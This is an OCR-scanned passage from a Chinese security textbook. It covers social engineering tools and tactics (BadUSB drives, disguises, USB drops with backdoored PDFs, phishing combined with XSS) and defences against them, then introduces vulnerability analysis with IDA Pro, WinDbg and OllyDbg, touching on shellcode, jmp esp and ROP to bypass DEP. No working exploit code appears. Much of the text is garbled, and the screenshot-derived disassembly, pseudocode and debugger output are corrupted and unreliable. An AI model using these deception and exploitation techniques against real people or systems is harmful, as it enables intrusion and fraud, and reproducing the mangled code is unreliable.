近 些 年 来 ， 出 现 了 很 多 社会 工程 人 员工 具 包 ， 它 们 比较 符合 国人 的 使 用 习惯 ， 社 会 工 
程 人 员工 具 包 包括 众多 的 小 工具 ， 在 各 种 工具 包 中 ， 你 可 以 找到 很 多 你 喜欢 的 或 者 常用 的 
工具 ， 你 也 可 以 去 找 找 国 外 的 社会 工程 人 员工 具 包 ， 其 中 有 诸如 PDF 攻击 一 类 的 小 工具 。 


7.4.2 物理 工具 

除了 一 些 在 线 工具 ， 社 会 工程 学 所 使 用 的 物理 工具 也 不 少 ， 其 中 很 多 都 是 生活 中 常见 
的 物品 ， 这 也 印证 了 那 句 话 “没有 办 不 到 ， 只 有 想不到 ”。 

1. Us 


在 U 盘 里 安装 好 系统 ， 例 如 Kali Linux， 随 时 能 在 各 种 计算 机 上 插入 启动 。 与 U 盘 类 
BadUSB 也 可 以 用 于 进行 社会 工程 学 攻击 。 


2. 名 片 和 特殊 服装 


在 与 人 接触 时 ， 一 张 看 起 来 符合 自己 身份 的 名 片 可 以 让 目标 很 快 对 攻击 者 产生 信任 
感 ， 同 时 一 些 特殊 服装 可 以 帮助 他 们 伪装 成 一 些 特殊 身份 一 一 比如 在 前 文 提 到 的 伪装 成 快 
递 小 哥 ， 就 需要 一 件 快递 公司 工作 人 员 的 服装 。 


з. 纸张 和 笔 


无 论 在 哪里 ， 随 身 携带 纸 和 笔 都 是 一 个 很 好 的 习惯 ,不 同 于 电子 备忘录 ， 纸 张 给 人 的 
发 挥 空间 更 大 ， 不 仅 可 以 随时 记录 目前 的 进展 情况 ， 还 可 以 规划 下 一 步 动 作 。 但 一 定 要 注 
意 销毁 重要 内 容 ， 别 让 这 个 习惯 成 为 绊脚石 。 


似 





7.5 ”社会 工程 学 的 应 用 


社会 工程 学 是 一 门 独特 且 富 有 魅力 的 学 科 ， 它 来 源 于 生活 ， 但 社会 工程 学 只 是 一 门 独 
立 的 学 问 吗 ? 当然 不 是 ! 下 面 就 来 探讨 社会 工程 学 和 其 他 技术 的 配合 方法 。 


7.5.1 社会 工程 学 与 前 端 安全 
有 一 个 经 典 的 社会 工程 学 攻击 案例 : 社会 工程 人 员 利用 人 们 的 好 奇 心 或 者 贪图 小 便 
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宣 的 心理 ， 使 某 个 人 “ 捡 到 ”他 “不 小 心 丢掉 ”的 U 盘 ， 在 好 奇 心 的 驱使 下 该 人 将 这 个 U 
盘 插 入 自己 的 计算 机 ， 并 打开 了 里 面 带 有 后 门 的 PDF 文件 ， 从 而 导致 在 不 知 不 觉 中 给 该 人 
的 计算 机 种 下 了 供 他 人 随意 出 入 的 后 门 ， 这 种 攻击 方式 在 Web2.0 下 的 应 用 ， 就 是 社工 与 
XSS 的 结合 。 

回顾 一 下 在 上 一 章 的 前 端 安全 中 重点 介绍 的 XSS 技 术 ， 如 果 让 目标 打开 一 个 特定 U 盘 
里 的 文件 稍 显 困难 的 话 ， 那 么 让 他 打开 一 个 链接 就 要 简单 得 多 ， 至 于 如 何 让 目标 打开 攻击 
者 构造 的 恶意 链接 而 察觉 不 到 ， 就 需要 社会 工程 学 来 配合 了 ， 最 有 效 的 方式 就 是 发 送 会 让 
目标 感 兴趣 的 邮件 ， 让 目标 “情不自禁 ”地 打开 链接 。 当 然 ， 不 只 是 XSS， 社 会 工程 学 还 
可 以 配合 很 多 其 他 前 端 技巧 ， 例 如 钓鱼 攻击 、CSRF 等 。 


752 ”社会 工程 学 与 渗透 测试 


社会 工程 学 配合 渗透 测试 的 实例 实在 是 数不胜数 ， 在 渗透 某 网 站 遇 到 困难 时 ， 给 网 站 
客服 人 员 打 个 电话 ， 往 往 就 能 解决 很 多 问题 。 再 者 ， 很 多 服务 器 的 登录 密码 都 与 该 服务 器 
的 管理 人 员 有 关 ， 而 密码 又 总 是 有 着 个 人 的 痕迹 ， 所 以 利用 社会 工程 学 得 到 服务 器 管理 人 
员 的 一 些 信息 之 后 ， 再 进行 服务 器 渗透 测试 就 要 简单 得 多 了 。 


7.5.8 ”社会 工程 学 与 无 线 攻 击 

有 这 样 一 个 实例 : 

一 位 攻击 者 希望 获取 某 个 程序 的 源 代码 ， 他 做 了 一 系列 的 准备 活动 一 一 获取 咖啡 厅 的 
无 线路 由 器 密码 ， 控 制 在 目标 附近 的 摄像 头 ， 接 着 把 目标 〈 源 代码 拥有 者 ) 约 在 咖啡 馆 ， 通 过 


摄像 头 捕获 到 了 被 攻击 者 行动 的 图 像 信息 ， 通 过 简单 分 析 后 获得 了 目标 的 邮箱 账号 和 密码 。 


之 后 的 事情 就 不 难 想象 了 ， 这 个 例子 在 本 章 稍 前 位 置 有 过 详细 的 复原 过 程 ， 读 者 不 妨 
带 着 社会 工程 学 的 思路 去 复习 一 遍 ， 想 想 可 以 做 什么 以 及 应 该 如 何 防范 。 





7.6 如 何 防范 社会 工程 学 


7.6.1 你 的 信息 安全 吗 


对 于 一 个 长 时 间接 触 计算 机 网 络 的 人 来 说 ， 网 络 上 肯定 会 留 下 他 的 痕迹 ， 攻 击 者 甚至 
通过 一 个 QQ 号 码 或 是 一 个 邮箱 ， 就 能 获取 拥有 者 的 全 部 信息 ， 这 一 点 也 不 奇怪 。 攻 击 者 
只 需 用 搜索 引擎 搜索 这 个 QQ 账号 或 是 邮箱 ， 就 可 以 找到 很 多 相关 的 内 容 ， 如 果 通 过 这 些 
信息 发 现 了 目标 的 社交 账号 ， 那 么 就 会 有 更 多 的 信息 面临 着 泄露 的 风险 。 
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不 仅 是 这 些 公 开 或 半 公开 的 信息 ， 即 便 是 完全 保密 的 信息 也 有 可 能 处 于 十 分 危险 的 境 
地 ， 一 次 社交 网 站 的 数据 泄露 ， 就 可 能 波及 用 户 的 所 有 信息 。 


762 ”学 会 识别 社会 工程 学 攻击 


防御 和 减轻 社会 工程 学 攻击 的 第 一 步 是 了 解 攻击 ， 从 攻击 者 的 角度 出 发 ， 才 能 全 方位 
地 了 解 防御 。 社 会 工程 学 是 一 门人 与 人 接触 的 艺术 ， 但 这 并 不 代表 着 所 有 与 你 接触 的 人 都 
是 攻击 者 ， 保 持 适当 警惕 ， 学 会 辨识 社会 工程 学 攻击 ， 才 是 以 不 影响 生活 为 前 提 的 同时 防 
御 社会 工程 学 攻击 的 最 好 方法 。 


77 À hi 


Only two things are infinite, the universe and human stupidity。 爱 因 斯 坦 的 这 名 名言 在 
社会 工程 学 中 应 验 了 ， 人 类 的 感情 成 为 了 社会 工程 学 的 突破 口 ， 进 而 威胁 到 整个 与 之 相关 
的 体系 。 

社会 工程 学 是 一 门 艺术 ， 纵 使 不 怀 好 意 者 可 能 利用 它 来 对 我 们 进行 攻击 ， 但 只 要 我 们 
掌握 了 社会 工程 学 知识 ， 并 在 生活 中 保持 适当 警惕 ， 恶 意 攻 击 就 很 难得 途 。 只 有 在 不 过 度 
妨碍 生活 的 情况 下 ， 保 护 我 们 的 信息 安全 才 是 有 意义 的 。 
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当 打 开 一 个 文档 或 用 浏览 器 打开 一 个 网 址 时 ， 也 许 读 者 会 很 快 被 文档 或 网 页 中 的 丰富 
的 内 容 所 吸引 ， 但 你 却 不 会 知道 ， 这 可 能 有 一 个 木马 已 经 悄悄 地 在 自己 的 计算 机 里 留 下 了 
后 门 ， 你 的 游戏 账号 、 隐 私信 息 等 正在 被 屏幕 另 一 端的 某 某 某 拿 走 。 现 在 应 用 软件 层 出 不 
穷 ， 无 论 是 微软 、Adobe 这 些 大 型 公司 ， 还 是 一 些 不 知名 的 小 公司 旗下 都 有 众多 产品 。 有 
位 大 牛 曾经 说 过 ， 不 可 能 存在 绝对 安全 的 软件 ， 在 这 一 章 中 ， 笔 者 将 带 大 家 走 入 漏洞 的 世 
界 ， 看 看 一 个 小 小 的 逻辑 错误 究竟 会 造成 怎样 的 严重 后 果 。 

这 一 章 会 涉及 很 多 汇编 语言 和 C 语 言 的 知识 ， 笔 者 尽量 降低 难度 为 大 家 还 原 漏洞 触发 
以 及 攻击 的 整个 过 程 ， 并 穿插 介绍 一 些 汇编 语言 和 C 语 言 的 知识 。 





81 漏洞 分 析 那 些 事 


8.1.1 什么 是 软件 漏洞 分 析 


Web 端 有 Web 端 的 漏洞 ， 系 统 有 系统 的 漏洞 ， 应 用 软件 有 应 用 软件 的 漏洞 ， 而 它们 绝 
大 多 数 都 是 由 于 简单 的 逻辑 错误 导致 的 ， 所 以 从 另 一 个 角度 讲 ， 黑 客 和 程序 员 也 有 着 千 丝 
万 缕 的 联系 。 有 时 候 当 一 个 程序 员 费 了 几 个 月 的 时 间 写 了 几 十 万 行 代码 ， 但 是 黑客 一 个 小 
小 的 操作 可 能 就 要 让 这 个 程序 重 写 一 遍 。 

其 实 漏洞 的 分 析 就 是 在 逆向 进行 漏洞 发 生 的 过 程 ， 假 如 说 这 个 程序 因为 执行 了 某 些 函 
数 和 某 些 畸 形 字符 串 崩 演 了 ， 如 果 崩 省 的 这 一 刻 叫 作案 发 现场 的 话 ， 我 们 就 要 回溯 到 程序 
崩溃 前 ， 分 析 原 因 并 找 出 Bug 所 在 。 

在 此 之 前 ， 需 要 和 弄 懂 一 些 概念 ， 首 先是 栈 的 概念 ， 这 对 于 漏洞 分 析 至 关 重 要 。 其 实 
无 论 是 漏洞 ， 还 是 逆向 这 样 的 反 汇编 操作 ， 或 是 正 向 的 编程 ， 我 们 都 需要 了 解 它们 ， 因 为 
PC 端 和 移动 端 都 一 样 ， 都 有 堆栈 操作 。 

栈 其 实 可 以 看 作 一 块 空间 ， 当 调用 一 个 函数 参数 的 时 候 ， 这 个 参数 就 会 进 到 这 个 栈 
里 ， 这 个 空间 就 好 像 一 个 死胡同 ， 先 进来 的 就 在 最 里 面 ， 后 面 依 次 排列 ， 所 以 栈 对 于 参数 
的 操作 是 先进 后 出 ， 后 进 先 出 。 

其 实 一 个 程序 的 操作 就 是 不 断 地 在 对 栈 操 作 ， 当 调用 一 个 函数 的 时 候 ， 就 会 开辟 一 块 
栈 空 间 ， 然 后 把 这 个 函数 要 用 的 参数 全 部 放 到 栈 里 ， 经 过 一 系列 操作 之 后 ， 会 将 这 些 参数 
释放 出 来 ， 返 回 某 些 结果 给 外 层 的 调用 函数 ， 最 后 再 释放 这 块 空间 ， 而 大 多 数 的 漏洞 都 是 
发 生 在 这 里 。 

所 谓 缓冲 区 溢出 ， 可 以 分 为 栈 溢出 和 堆 溢 出 ， 说 白 了 就 是 在 进行 这 些 函数 操作 的 时 
候 ， 可 能 由 于 一 个 if 语 句 或 者 一 个 strcpy 函 数 导致 栈 或 者 堆 被 破坏 ， 导 致 程序 无 法 正常 执行 
它 该 执行 的 内 容 ， 这 就 造成 了 衣 溃 ， 也 就 造成 了 漏洞 的 产生 。 
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8.1.2 漏洞 分 析 的 作用 


有 很 多 人 觉得 漏洞 分 析 没 什么 用 ， 不 如 那些 Web 端 漏洞 危险 ， 其 实 软件 漏洞 造成 的 危 
害 是 极 大 的 ， 例 如 2008 年 一 个 震惊 世界 的 超级 漏洞 MS08-067， 将 整个 Windows XP 系统 以 
及 Windows Server 2003 系 统 推 到 了 风口 浪 尖 。 很 难 想象 ， 当 输入 对 方 的 一 个 了 了 地址 ， 就 能 
够 控制 对 方 的 计算 机 ， 时 至 今日 ，MS08-067 依 然 被 应 用 在 黑客 的 攻防 当中 ， 而 这 个 漏洞 
诞生 的 原因 正 是 对 于 “/” 字 符 的 向 前 检索 。2014 年 仍然 是 漏洞 集体 爆发 的 一 年 ， 年 初 的 
“心脏 出 血 ”、 年 中 的 shellshock 破 壳 、 年 底 的 IE“ 神 洞 ”CVE2014-6332 都 是 危害 等 级 极 
高 的 神 级 漏洞 。 

通过 漏洞 分 析 ， 我 们 不 仅 能 看 到 整个 漏洞 爆发 的 过 程 ， 还 能 找到 利用 它 的 方式 ， 这 里 
白 帽 子 会 积极 联系 厂商 及 时 修复 ， 而 黑客 会 继续 开发 Exploit， 利 用 漏洞 来 发 起 一 个 又 一 个 
的 攻击 。 

无 论 是 出 于 对 用 户 的 保护 ， 还 是 出 于 私人 的 目的 ， 漏 洞 分 析 都 是 必 不 可 少 的 过 程 。 这 
里 笔者 要 特别 提 及 一 下 POC 这 个 概念 ，POC 是 漏洞 验证 的 程序 ， 用 来 验证 在 你 配置 的 漏洞 
分 析 环 境 下 ， 是 否 能 够 成 功 触 发 漏洞 ， 而 POC 里 不 包含 恶意 代码 ， 就 好 像 网 上 的 绿色 软件 
一 样 。shellcode 是 传说 中 的 恶意 代码 ， 也 就 是 在 利用 漏洞 的 时 候 ， 通 过 触发 软件 漏洞 使 程 
序 去 执行 shellcode， 从 而 远程 完成 在 目标 计算 机 上 的 操作 。 

在 完成 一 次 完整 的 漏洞 分 析 和 利用 之 前 ， 还 需要 了 解 使 用 哪些 工具 可 以 完成 这 个 过 
程 。 其 实 网 上 对 于 漏洞 分 析 、 利 用 的 工具 很 多 ， 包 括 很 多 大 牛 也 做 出 过 用 来 fuzz 的 工具 ， 
以 及 很 多 能 挂 载 在 OD、IDA 上 的 插件 。 当 然 ， 对 于 漏洞 分 析 还 需要 重点 了 解 三 个 “ 神 
器 ”， 这 三 个 神器 可 以 说 是 漏洞 分 析 的 主体 ， 如 果 对 这 三 个 工具 了 如 指 掌 的 话 ， 对 于 现 如 
今 99% 的 软件 漏洞 都 能 拨 开 其 面纱 ， 了 解 其 本 质 。 

在 笔者 为 大 家 分 享 漏 洞 分 析 过 程 之 前 ， 在 此 对 这 三 种 工具 做 简单 说 明 ， 当 我 们 了 解 了 
这 三 种 工具 的 使 用 及 分 析 方 法 之 后 ， 就 是 万 事 俱 备 ， 只 从 东风 了 ! 

以 下 内 容 适 合 对 IDA Pro、WinDbg 以 及 OllyDbg 不 了 解 的 初学 者 学 习 ， 对 这 三 种 工具 
了 解 或 者 精通 的 读者 可 以 略 过 以 下 内 容 。 有 些 工 具 在 下 一 章 也 会 介绍 ， 但 是 侧重 点 不 尽 相 
同 ， 读 者 可 互补 学 习 。 


1. IDA Pro 


IDA Pro 是 静态 反 汇 编 的 神器 ， 无 论 在 Windows 还 是 Linux 系 统 下 都 有 不 凡 的 表现 。 随 
着 IDA Pro 的 更 新 ， 它 现在 也 开始 支持 动态 调试 ， 其 强大 的 反 汇 编 能 力 不 仅 能 将 PE 文件 的 
文件 格式 分 析 得 一 清二 楚 ， 而 且 可 以 将 选择 的 代码 段 反 汇编 成 伪 代 码 的 形式 ， 大 大 缩短 了 
分 析 枯 燥 的 汇编 代码 的 时 间 。 它 不 仅 能 够 在 Windows 下 完成 文件 的 分 析 ， 同 时 在 令 人 烦恼 
的 Linux 系 统 下 仍旧 可 以 完成 文件 的 分 析 。Linux 下 常见 的 反 汇 编 方式 就 是 使 用 GDB， 但 是 
GDB 也 是 在 命令 行 下 使 用 ， 而 且 绝 大 部 分 溢出 需要 -core 的 支持 ， 其 烦琐 程度 令 人 恼火 ， 
但 是 IDA Pro 的 Remote Linux Debugger 功 能 非常 强大 ， 可 以 支持 远程 调试 Linux 下 的 软 
件 ， 这 将 大 大 减少 烦琐 的 命令 行 操作 ， 令 Linux 下 的 软件 ， 进 程 调试 变 得 和 Windows 下 一 
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样 简单 。 

下 面 笔 者 将 针对 IDA Pro 进 行 一 些 入 门 级 的 介绍 ， 描 述 在 进行 漏洞 分 析 过 程 中 需要 的 
一 些 主要 功能 ， 其 实 IDA Pro 本 身 的 功能 非常 强大 ， 其 余 的 功能 需要 读者 慢 慢 学 习 。 

IDA Pro 的 主 界面 如 图 8-1 所 示 ， 界 面 上 方 是 菜单 栏 ， 其 中 包含 了 IDA 的 所 有 工具 ， 左 
侧 是 函数 栏 ， 右 侧 是 主 窗口 ， 下 方 是 输出 栏 。 左 侧 的 函数 栏 在 没有 导入 Windows 的 符号 
表 的 时 候 ， 会 将 函数 以 “sub 数字 ”的 形式 表现 ， 其 实 它 代表 着 一 些 函 数 的 定义 ， 比 如 
printf、strcpy 等 ， 当 符号 表 导 入 之 后 ， 这 里 就 会 显示 出 真正 的 函数 值 了 。 
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‚ 2Fh 
short loc t72606 


; CODE XEF* «шр сузвлсетату 
eax, word ptr [esi«2] 


eax, 

short loc t73606 
73649 

loc 073639: ; CODE XREF: sub C7961C«267j 

өч? movzx вах, word ptr [esità] 


lea eax, [esi*é] 
novax ecx, word ptr [eax] 
xor edx, edx 


























JC.MSCESS [em Time KU 


图 8-1 IDA Pro 主 界面 

界面 右 侧 是 反 汇编 的 主 窗口 ， 在 IDA View-A 菜 单 中 会 包含 反 汇 编 的 结果 ， 其 中 .text 代 
表 着 PE 文件 中 的 字段 ， 后 面 的 8 个 字 节 是 汇编 语言 所 在 的 内 存 地 址 。 

当选 中 某 段 汇编 语言 后 ， 按 F5 键 会 将 该 段 汇 编 语言 反 编译 成 伪 代 码 的 形式 ， 这 样 使 逆 
向 调试 变 得 更 为 简单 ， 更 容易 分 析出 漏洞 的 形成 原因 ， 如 图 8-2 所 示 。 

在 对 PE 文件 进行 加 载 并 用 IDA Pro 完 成 分 析 之 后 ， 它 会 将 该 程序 的 代码 结构 以 流程 
图 的 形式 展现 出 来 ， 如 图 8-3 所 示 。 这 不 仅 方便 我 们 观察 每 个 模块 之 间 的 关联 与 跳 转 等 关 
系 ， 同 时 再 对 补丁 进行 比较 分 析 ， 从 而 快速 定位 漏洞 位 置 时 也 起 到 了 很 大 作用 。 
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GetStartupInfoW( (LPSTARTUPINFOW) (a1 - 185)); 
if ( fduord 117B888 ) 

HeapSetInformation(8, HeapEnableTerminationünCorruption, 8, 8); 
if ( ШОШО t- 23117 


|] *( DUORD ж) ( + 4194304) t= 17744 
11 *(_WORD =) (| + 4194328) 
11 *(_DWORD =)( + 4194428) 


*( DUORD x)(a1 - 28) = 8; 

else 
*( DUORD *)(a1 - 28) = *( DUORD =) (8038 + 1195536) 

if ( fsub C7F56R() ) 
sub C73535(28); 

if ( fsub C7B8F3() ) 
sub C73535(16); 

sub £9263B(); 

*( DUORD x)(a1 - 4) = 

if ( sub С81Е85() < 8 
sub C713E6(27); 

duord 117B885 = (int)GetCommandLinef(); 

duord 1177598 - sub C9318D(); 

if ( sub C930F2() < 8 ) 











9; 
) 


sub C713E6(8); 
v1 = v2; 


H 

if ( sub С92Е60(01) < 8) 
sub C713E6(9); 

v3 = sub С711С5(1); 

vh = 05; 

if ( 93 ) 

Н 


sub C713E6(03); 
vh = v6; 


图 8-2 IDA Pro 反 编译 伪 代 码 窗口 
Y 

















eax, ds:h0003Ch 
dword ptr [eax+400000h], 4558h| 
short loc C735DE 





ecx, 10h 
[eaxe^00018h], cx 
Short loc C73ADE 


























duord ptr [eax+400074h], BEN 
short loc C734DE 


ecx, ecx 
[eax+n000E8h], esi 
cl 

[ebp-iCh], ecx 
































sub C7F56R 
eax, eax 
chart Лас 0729201 


8-3 IDA pro 反 汇编 流程 图 窗口 
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Hex View-A 是 将 程序 以 十 六 进 制 形式 表现 ， 和 UltraEdit 的 功能 类 似 ， 在 这 里 可 以 快速 
搜索 定位 关键 的 汇编 代码 段 ， 比 如 通过 查找 FF E4 就 能 快速 定位 到 Jmp esp 上 等 ， 如 图 8-4 


所 示 。 


x 国 IDA ViewA | x [S] PseudocodeA x Ed Hexvewa | x À Structures | x En Enums | x ER Imports | x 28 Exports | 


22. Ё Tjow?. 


ec73612 
88C73622 
90с73632 
88C73642 
88С73652 
88С73662 
88С73672 
00C73682 
80C73692 
8073682 
80C736B2 
ввс736С2 
0073602 
00736E2 
99C736F2 
90С73702 


GIN MIEL E9 89 FE 


88 00 59 83 F8 85 OF 82 
F8 5С 74 85 83 F8 2F 75 
74 85 83 F8 2F 75 6D OF 
83 F8 2F 75 5F 8D 56 86 
74 52 66 83 F9 5C 74 11 
82 8F B7 88 66 3B CR 75 
82 66 39 18 74 2E BF B7 
F9 5С 74 11 66 83 F9 2F 
66 3B Ch 75 E9 66 39 18 
33 C8 40 СЗ 33 СӨ СЗ 8B 
DD FF FF 8B 30 E8 7A DD 
FF 75 8C FF 75 08 ES 79 
E8 5F DD FF FF 85 FF 7^ 
38 22 74 04 33 СӨ EB 1B 
75 OC 89 30 ба 00 ES 49 


FF FF 8B FF 56 E8 
88 


12 15 
80 68 00 OF B7 
BF B7 46 82 83 
зб Өз 83 F8 5C 
B7 88 33 D2 66 
66 83 F9 2F 7^ 8B 
E9 66 39 18 7^ 36 
08 66 ЗВ CA 74 22 
74 ӨВ 83 CO 02 GF 
7h 06 66 39 58 82 
FF 55 8B EC 56 57 
FF FF FF 75 18 83 
^B 01 00 83 C^ OC 
06 89 30 8B C7 EB 25 83 


E8 ^7 DD FF FF бй 88 FF 8"t.3 
81 00 8B ^D 14 83 C^ ч.?]. 





4B 


8-4 IDA Pro 内 存 显示 窗口 
前 文 提 到 的 远程 调试 Linux 的 功能 ， 可 以 执行 Debugger 一 Run 一 Remote Linux debugger 
命令 完成 ， 同 时 IDA 还 支持 不 同 的 远程 调试 ， 如 图 8-5 所 示 。 














Jump Search View | Debugger Options Windows Help 






























Local Bochs debugger 








Local Windows debugger 






































Remote GDB debugger 











Remote Linux di 





Remote Mac OS X debugger 






Remote Symbian debugger 
Remote WinCE debugger 
Remote Windows debugger 








Remote iPhone vl.x debugger 
Windbg debugger 





图 8-5 IDA Pro 菜 单 栏 及 远程 调试 选项 
在 理解 和 掌握 之 后 ，IDA Pro 的 主要 功能 我 们 就 能 很 好 地 结合 动态 调试 工具 对 漏洞 进 


行 分 析 。 


2. WinDbg 


WinDbg 是 笔者 很 喜欢 使 用 的 工具 ， 是 微软 调试 器 集合 的 一 个 GUI 界面 ， 它 可 以 针对 
用 户 态 和 内 核 态 进行 调试 ， 它 精简 却 很 彪 悍 ， 虽 然 界 面 不 如 OllyDbg 友 好 ， 但 是 其 调试 功 
能 强大 得 令 人 震惊 ， 尤 其 是 对 页 堆 的 跟踪 ， 对 于 现在 很 多 的 堆 溢 出 漏洞 来 说 是 一 个 很 简便 
的 过 程 ， 很 容易 就 能 观察 到 指定 内 存 区 域 的 堆 变化 情况 。 

下 面 简要 介绍 WinDbg 界 面 及 常用 的 调试 命令 ，WinDbg 的 调试 命令 非常 丰富 ， 在 不 同 


的 漏洞 环境 下 需要 调用 不 同 的 命令 ， 


这 里 为 方便 读者 入 门 只 介绍 比较 通用 的 命令 ， 不 常用 


— 142 一 一 





„ав ”逆向 技术 与 软件 安全 / фу / 





的 命令 需要 读者 在 对 漏洞 进行 多 层次 了 解 分 析 之 后 再 进行 研究 。 

WinDbg 的 主 界面 《如 图 8-6 所 示 ) ， 在 我 们 通过 File 进 行 对 PE 文件 的 打开 或 对 进程 的 
附加 之 后 ， 仅 仅 只 打开 了 CMD 窗 口 ， 其 他 的 窗口 需要 通过 在 View 里 选择 打开 ， 图 8-6 中 展 
示 的 是 几 个 常用 的 窗口 ， 其 实 也 是 OllyDbg 主 界面 中 展示 给 用 户 的 窗口 ， 其 中 左上 窗口 是 
寄存 器 窗口 ， 左 下 窗口 是 展示 内 存 区 域 的 窗口 ， 中 间 窗 口 是 动 态 调试 及 命令 输入 的 窗口 ， 
右 侧 是 反 汇 编 跟踪 窗口 。 


nDbg: 5. 7- 0005, 
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图 8-6 ”WinDbg 主 界面 
对 于 每 个 窗口 的 跟踪 使 用 ， 这 里 不 做 说 明 ， 感 兴趣 的 读者 可 以 在 OllyDbg 工 具 的 API 
文档 中 根据 介绍 详细 了 解 ， 或 者 可 以 查阅 相关 的 资料 ， 这 里 主要 讲解 常用 的 调试 命令 。 
在 CMD 窗 口中 ， 下 方 就 是 输入 命令 的 地 方 ， 在 菜单 栏 的 Debug 区 域 可 以 看 到 通过 按 
Fl1、F10、F5 键 或 直接 单 击 可 以 对 程序 目前 中 断 的 地 方 进行 步 过 、 步 进 及 执行 等 操作 ， 
与 VS 或 者 VC6.0 的 调试 方式 是 异曲同工 的 ， 当 然 这 里 也 可 以 通过 在 下 方 命令 栏 输入 t( 步 
М). р ОРЖ) Же (执行 ) 的 方式 进行 调试 〈 见 图 8-7) 
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Microsoft (R) Windows Debugger Version 6.7.0005.1 
Copyright (c) Microsoft Corporation. All rights reserve| 


же wait with pending attach 
Symbol search path is: *** Invalid w** 
——————————— 
ж Symbol loading may be unreliable without a symbol sez 
* Use .synfix to have the debugger choose a symbol path 
ж After setting your symbol path. use .reload to refreş 
ээс жэеэс эе эээ эе эе эс ээс эээ эк эж ээс ээ ЭЕ ээ эк эс эс ээс эээ э-ээ эс ээ эе э ээк эе эе. 
Executable search path is 
: 01000000 0101000 

: 7с920000 7c9b3000 

: 7c800000 7c91e000 
7d590000 7dd84000 

: 77820000 772849000 

: 77e50000 77ее2000 
77fc0000 77£d1000 

: 77ef0000 77£39000 

: 77410000 779а0000 

: 77be0000 77c38000 

: 77£40000 77£b6000 

: 5cc30000 5сс56000 

: 59fb0000 59172000 
76b10000 76b3a000 

: 76990000 76acd000 
770£0000 7717b000 

: 77bb0000 77bc5000 

: 77bd0000 77bd8000 

: 759d0000 75a7f000 
5adc0000 5adf7000 

76300000 76314000 

: 62c20000 62c29000 
73#а0000 7400b000 

77180000 77283000 


:NVINDOUS*systen32*calc.e| 
NVINDOUS«systen32*ntdll 
NVINDOUS*systen32*kernel| 
NVINDOUS«systen32*SHELL3 

:NVINDOUS*systen32*ADVAPI| 
NVINDOWS*systen32*RPCRT4 
*WINDOWS*systen32*Secur: 
NVINDOVS«systen32*GDI32 | 
NVINDOUVS«systen32*USER32 
NWINDOWS«systen32*nsvcrt 
NVINDOUS«systen32*SHLWAF| 
NVINDOUS*«systen32*ShimEr| 
NVINDOUS«AppPatch*AcGeni 
NVINDOWS«systen32sWINMM 
NVINDOUS«systen32*01e32 
NVINDOUS*«systen32*OLEAUT| 
SWINDOUSNsystenm32SMSACH:J 
SWINDOUSNsysten32SVERSIC]| 
NWINDOWSNsystem32\USERE] 
SWINDOUSNsystem32SUxThen| 
MIINDOWS\system32\IMN32 
SWINDOUSNsystenm32NLPK.DI 
\WINDOWVS\system32\USP10 
WINDOWS\WinSxS\x86_Mic| 

: 74680000 746cc000 SWINDOUSNsystem32SMSCTF. 

: 73640000 7366e000 N\WINDOWS\system32\nsct f il 

Break instruction exception — code 80000003 

leax=7ffd8000 ebx-00000001 ecx-00000002 edx-00000003 esil 
leip-7c92120e esp=00abf fcc ebp-00abfff4 іор1=0 

|cs-001b ss=0023 ds=0023 еѕ=0023 £fs-0038 gs-0000 

Defaulted t| 


O0000000000000000000000000 





8-7 Windbgé 47 
下 面 介绍 调试 过 程 中 几 个 主要 的 命令 。 
> kb 一 一 查看 堆栈 调用 ， 通 过 输入 kb 可 以 查看 进入 函数 前 都 调用 了 哪些 函数 ， 从 而 快 
速 回溯 还 原 漏洞 触发 前 的 场景 ， 有 助 于 快速 定位 漏洞 触发 的 位 置 ， 如 图 8-8 所 示 。 


Oüabfff4 00000000 00000000 00000008 000060c0 ntdll!DH 
图 8-8 Windbg kb 命令 

> bp，ba 一 一 下 断 点 ， 其 中 bp 可 以 对 指定 地 址 下 断 点 ; ba 可 以 对 函数 写 入 断 点 ， 执 
行 断 点 。 写 入 断 点 是 指 如 果 在 指定 内 存 区 域 有 新 的 数据 写 入 时 ， 则 触发 断 点 ， 
执行 断 点 是 指 当 该 内 存 区 域 的 内 容 被 执行 时 则 触发 断 点 ， 同 时 bc 可 以 用 来 删除 断 
点 。 也 可 以 通过 bp FFFFFFFF ".if(poi(@eax) 一 ).else{g; }" 的 方式 来 下 条 件 断 点 ， 
该 条 件 断 点 是 指 在 FEFFFFFFF 地 址 处 如 果 eax 等 于 某 值 时 暂停 ， 否 则 继续 。 

> dd esp 一 一 查看 某 寄存 器 内 容 ， 实 例 使 用 的 是 esp 寄 存 器 ， 这 里 可 以 改 eax、ebx 等 ， 
这 里 方便 对 寄存 器 的 跟踪 ， 可 以 很 好 地 分 析 在 漏洞 触发 时 寄存 器 的 变化 状况 等 ， 
如 图 8-9 所 示 。 

> !heap-p-a 一 一 打开 页 堆 异 常 检 测 ， 其 主要 功能 是 在 堆 空间 ， 如 果 此 时 页 扒 发 生 异 常 
则 显示 ， 这 是 对 很 多 堆 溢出 漏洞 调试 非常 实用 的 工具 。 
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— 
Àddress expression missing from '«EOL»' 
0:001» dd esp 

üüabffcc  7c970010 00000005 00000004 00000001 
00abffdc OD0abffd0 0001aa3b ffffffff 7c92e900 
üüabffec 7с970030 00000000 00000000 00000000 
DDabfffc 00000000 00000008 000060c0 00000000 
00ac000c ffffffff 00004000 00000001 00000000 
üüacüüic 00000000 00000000 00000000 00000560 
00ас002с 00002050 28с?#140 1142ае25 1000ddaf 
00ас003с Ь599275а 0000000а 00000001 00000000 


图 8-9 Windbg dd 命令 
以 上 命令 是 在 漏洞 分 析 时 常用 的 命令 ， 通 过 对 这 些 命令 的 理解 ， 可 以 很 好 地 看 到 寄存 
器 的 变化 ， 定 位 汇编 代码 ， 再 通过 对 汇编 代码 的 回溯 分 析 ， 找 到 漏洞 的 触发 点 以 及 形成 
原因 。 





3. OllyDbg 


OllyDbg 是 对 于 刚 入 门 者 最 推荐 的 动态 调试 工具 ， 它 的 界面 相 比 WinDbg 来 说 非常 友 
好 ， 而 且 对 于 堆栈 状态 的 展示 非常 清晰 。 如 果 说 OllyDbg 是 一 个 界面 的 话 ，WinDbg 就 像 命 
令 行 一 样 ， 同 时 OllyDbg 同 样 支持 二 次 开发 ， 有 很 多 人 将 自己 的 插件 放 在 OllyDbg 里 辅助 
反 汇编 ， 往 往 可 以 事半功倍 。 同 时 OllyDbg 本 身 也 自 带 一 些 非常 好 用 的 插件 ， 比 如 Disable 
DEP， 这 对 于 构造 ROP 链 绕 过 DEP 来 说 会 起 到 很 大 作用 ， 它 能 迅速 帮助 使 用 者 定位 到 构造 
